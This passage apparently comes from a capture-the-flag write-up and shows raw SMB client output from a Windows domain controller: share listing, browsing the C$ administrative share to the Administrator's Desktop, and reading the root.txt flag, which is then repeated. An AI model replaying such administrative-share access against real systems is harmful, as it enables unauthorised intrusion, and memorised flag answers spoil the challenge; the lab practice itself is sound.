drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 OCR
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Offline Web Pages
drw-rw-rw-          0  Tue Oct  7 17:57:34 2025 Panther
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Performance
-rw-rw-rw-   25775950  Tue Oct  7 17:55:43 2025 PFRO.log
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 PLA
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 PolicyDefinitions
drw-rw-rw-          0  Fri Feb 13 20:44:43 2026 Prefetch
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 Provisioning
-rw-rw-rw-     606208  Wed Mar 12 07:03:14 2025 regedit.exe
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Registration
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 RemotePackages
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 rescache
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 resources
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 SchCache
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 schemas
drw-rw-rw-          0  Thu Oct  9 14:15:15 2025 security
-rw-rw-rw-      48546  Wed Nov 13 19:57:59 2024 ServerDataCenter.xml
drw-rw-rw-          0  Thu Nov 14 04:20:36 2024 ServiceProfiles
drw-rw-rw-          0  Fri Feb 13 21:48:29 2026 ServiceState
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 servicing
drw-rw-rw-          0  Wed Nov 20 18:36:28 2024 Setup
-rw-rw-rw-          0  Thu Nov 14 04:22:17 2024 setuperr.log
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 ShellComponents
drw-rw-rw-          0  Wed Mar 12 07:02:34 2025 ShellExperiences
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 SKB
drw-rw-rw-          0  Thu Oct  9 13:50:17 2025 SoftwareDistribution
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Speech
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Speech_OneCore
-rw-rw-rw-     245760  Wed Mar 12 07:03:19 2025 splwow64.exe
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 System
-rw-rw-rw-        219  Wed Nov 13 19:54:41 2024 system.ini
drw-rw-rw-          0  Fri Feb 13 20:48:51 2026 System32
drw-rw-rw-          0  Wed Nov 13 20:49:33 2024 SystemApps
drw-rw-rw-          0  Wed Mar 12 07:02:46 2025 SystemResources
drw-rw-rw-          0  Fri Feb 13 21:46:46 2026 SystemTemp
drw-rw-rw-          0  Thu Oct  9 14:15:14 2025 SYSVOL
drw-rw-rw-          0  Thu Oct  9 14:14:17 2025 SysWOW64
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 TAPI
drw-rw-rw-          0  Thu Nov 14 04:22:18 2024 Tasks
drw-rw-rw-          0  Fri Feb 13 21:49:33 2026 Temp
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 tracing
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 twain_32
-rw-rw-rw-      69120  Wed Mar 12 06:56:24 2025 twain_32.dll
drw-rw-rw-          0  Wed Mar 12 07:02:48 2025 UUS
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Vss
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 WaaS
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Web
-rw-rw-rw-         92  Wed Nov 13 19:54:41 2024 win.ini
drw-rw-rw-          0  Wed Mar 12 07:02:48 2025 Windows.SystemToast.PresenceSensing.OnlookerDetection
drw-rw-rw-          0  Thu Dec 12 18:58:42 2024 WindowsAdminCenterSetup
-rw-rw-rw-        670  Sun Feb  8 22:34:28 2026 WindowsShell.Manifest
-rw-rw-rw-        276  Fri Feb 13 20:45:12 2026 WindowsUpdate.log
-rw-rw-rw-      12288  Wed Mar 12 06:56:24 2025 winhlp32.exe
drw-rw-rw-          0  Sun Feb  8 22:30:11 2026 WinSxS
-rw-rw-rw-     316640  Wed Nov 13 19:57:51 2024 WMSysPr9.prx
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C
[-] SMB SessionError: code: 0xc00000cc - STATUS_BAD_NETWORK_NAME - {Network Name Not Found} The specified share name cannot be found on the remote server.
# use C$
# ls
drw-rw-rw-          0  Tue Apr  1 14:24:22 2025 $Recycle.Bin
-rw-rw-rw-          0  Wed Mar 12 06:49:29 2025 $WINRE_BACKUP_PARTITION.MARKER
drw-rw-rw-          0  Tue Oct  7 17:55:51 2025 Documents and Settings
-rw-rw-rw-      12288  Fri Feb 13 20:44:05 2026 DumpStack.log.tmp
drw-rw-rw-          0  Wed Mar 12 07:02:28 2025 inetpub
-rw-rw-rw- 1006632960  Fri Feb 13 20:44:05 2026 pagefile.sys
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 PerfLogs
drw-rw-rw-          0  Wed Nov 13 20:26:15 2024 Program Files
drw-rw-rw-          0  Wed Nov 13 20:00:03 2024 Program Files (x86)
drw-rw-rw-          0  Thu Oct  9 20:32:41 2025 ProgramData
drw-rw-rw-          0  Tue Oct  7 17:56:07 2025 Recovery
drw-rw-rw-          0  Sun Oct 12 15:06:57 2025 System Volume Information
drw-rw-rw-          0  Thu Oct  9 15:42:28 2025 Temp
drw-rw-rw-          0  Fri Oct 10 22:36:54 2025 Users
drw-rw-rw-          0  Fri Oct 10 23:08:11 2025 Windows
# cd Users
# ls
drw-rw-rw-          0  Fri Oct 10 22:36:54 2025 .
drw-rw-rw-          0  Thu Oct  9 15:35:48 2025 ..
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Administrator
drw-rw-rw-          0  Tue Oct  7 17:55:51 2025 All Users
drw-rw-rw-          0  Tue Oct  7 17:56:24 2025 Default
drw-rw-rw-          0  Tue Oct  7 17:55:51 2025 Default User
-rw-rw-rw-        174  Wed Nov 13 19:54:41 2024 desktop.ini
drw-rw-rw-          0  Fri Oct 10 22:36:59 2025 hellye
drw-rw-rw-          0  Wed Nov 20 18:32:17 2024 Public
# cd Administrator
# ls
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 .
drw-rw-rw-          0  Fri Oct 10 22:36:54 2025 ..
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 AppData
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Application Data
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Contacts
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Cookies
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Desktop
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Documents
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Downloads
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Favorites
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Links
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Local Settings
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Music
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 My Documents
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 NetHood
-rw-rw-rw-    1048576  Fri Feb 13 21:49:30 2026 NTUSER.DAT
-rw-rw-rw-          0  Fri Feb 13 21:49:30 2026 ntuser.dat.LOG1
-rw-rw-rw-          0  Fri Feb 13 21:49:30 2026 ntuser.dat.LOG2
-rw-rw-rw-      65536  Fri Feb 13 21:49:30 2026 NTUSER.DAT{8d41c8c5-a1e4-11ef-a03f-0e47b7d8fc33}.TM.blf
-rw-rw-rw-     524288  Fri Feb 13 21:49:30 2026 NTUSER.DAT{8d41c8c5-a1e4-11ef-a03f-0e47b7d8fc33}.TMContainer00000000000000000001.regtrans-ms
-rw-rw-rw-     524288  Fri Feb 13 21:49:30 2026 NTUSER.DAT{8d41c8c5-a1e4-11ef-a03f-0e47b7d8fc33}.TMContainer00000000000000000002.regtrans-ms
-rw-rw-rw-         20  Fri Feb 13 21:49:30 2026 ntuser.ini
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Pictures
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 PrintHood
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Recent
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Saved Games
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Searches
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 SendTo
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Start Menu
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Templates
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 Videos
# cd Desktop
# ls
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 .
drw-rw-rw-          0  Fri Feb 13 21:49:30 2026 ..
-rw-rw-rw-        282  Fri Feb 13 21:49:30 2026 desktop.ini
-rw-rw-rw-         32  Fri Feb 13 21:49:30 2026 root.txt
# cat root.txt
90e665d4238a5b6a4e6948d09520f5c3
# 
                                                                         
```

## Root.txt

```bash
90e665d4238a5b6a4e6948d09520f5c3
```
